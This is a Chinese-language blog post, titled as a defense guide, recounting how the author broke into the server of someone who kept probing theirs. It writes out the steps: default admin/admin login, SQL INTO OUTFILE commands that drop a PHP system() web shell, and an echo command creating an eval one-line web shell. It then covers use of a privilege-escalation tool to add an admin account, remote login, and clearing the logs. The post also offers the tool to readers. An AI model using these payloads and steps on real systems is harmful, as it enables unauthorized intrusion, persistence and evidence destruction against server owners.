時常被黑客攻擊,看我如何做好防禦?
前言:習慣性每天都看阿裏雲日誌,發現有個IP每天都來嘗試攻擊我服務器,然後就有了下文。
X.X.X.78這個IP地址,每天都來嘗試搞我服務器。
當然,咱們也不能慫,對吧?
通過直接訪問IPX.X.X.78得知應該是個企業CMS,ip後面加上/admin進入後臺頁面。
嘗試通過賬號admin 密碼admin登陸成功。
後臺可以直接看到服務器信息,這裏比較重要的是,我們得到了網站的路徑C:/UPUPW/UPUPW_K2.1_64/htdocs/
然後開始找突破點,找到了商品管理的上傳圖片處,但是有過濾,嘗試多次都上傳失敗。
然後我繼續查找,突然眼前一亮,發現有個地方可以執行sql。
這裏我嘗試通過sql寫入shell,命令如下:
| 1 2 |
select load_file(‘C:/UPUPW/UPUPW_K2.1_64/htdocs/log.php‘);
select ‘<?php echo \‘<pre>\‘;system($_GET[\‘cmd\‘]); echo \‘</pre>\‘; ?>‘ INTO OUTFILE ‘C:/UPUPW/UPUPW_K2.1_64/htdocs/log.php‘
|
報錯不用管,嘗試訪問寫入的shell文件,發現已經成功了。
如下圖,已經擁有cmd權限
現在只要在cmd=後面加上命令即可寫入一句話(菜刀連接方便些)
通過執行以下命令,即可在當前目錄下產生一個文件名為ichunqiu.php。密碼為pass的webshell。
| 1 |
echo ^<^?php eval($_POST[pass]);?^>^ >>ichunqiu.php
|
菜刀連接成功,當然,這還沒完,繼續往下看。
菜刀切換到終端管理,執行tasklist發現進程裏面木有殺毒軟件,木有狗。(本彩筆表示笑尿了)
執行net user發現沒有回顯,也就是說不能直接通過net user添加管理員賬號。
經過一番折騰,嘗試用NC反彈提權,但是在執行完命令時,會直接中斷(不知道是不是阿裏雲的防護)
然後我上傳了提權工具[net2.exe],這個工具的用法就是,直接執行net2.exe admin pass(註意中間有空格)
提示如下就表示添加賬號成功了。
現在咱們遠程登錄試試。
遠程登錄成功,這裏我查了下他的遠程登錄日誌,發現一個固定IP X.X.X.X四川成都的地址,長期登錄這個服務器。
基本可以肯定,就是這位大佬經常沒事就控制這個服務器搞我了。(由於登錄上去後,我清空了日誌,沒來得及截圖)
給這位大佬提個醒。
在你搞別人的時候,可能對方已經反過來搞你了。
以上用到的提權工具已經上傳,回復可見。
時常被黑客攻擊,看我如何做好防禦?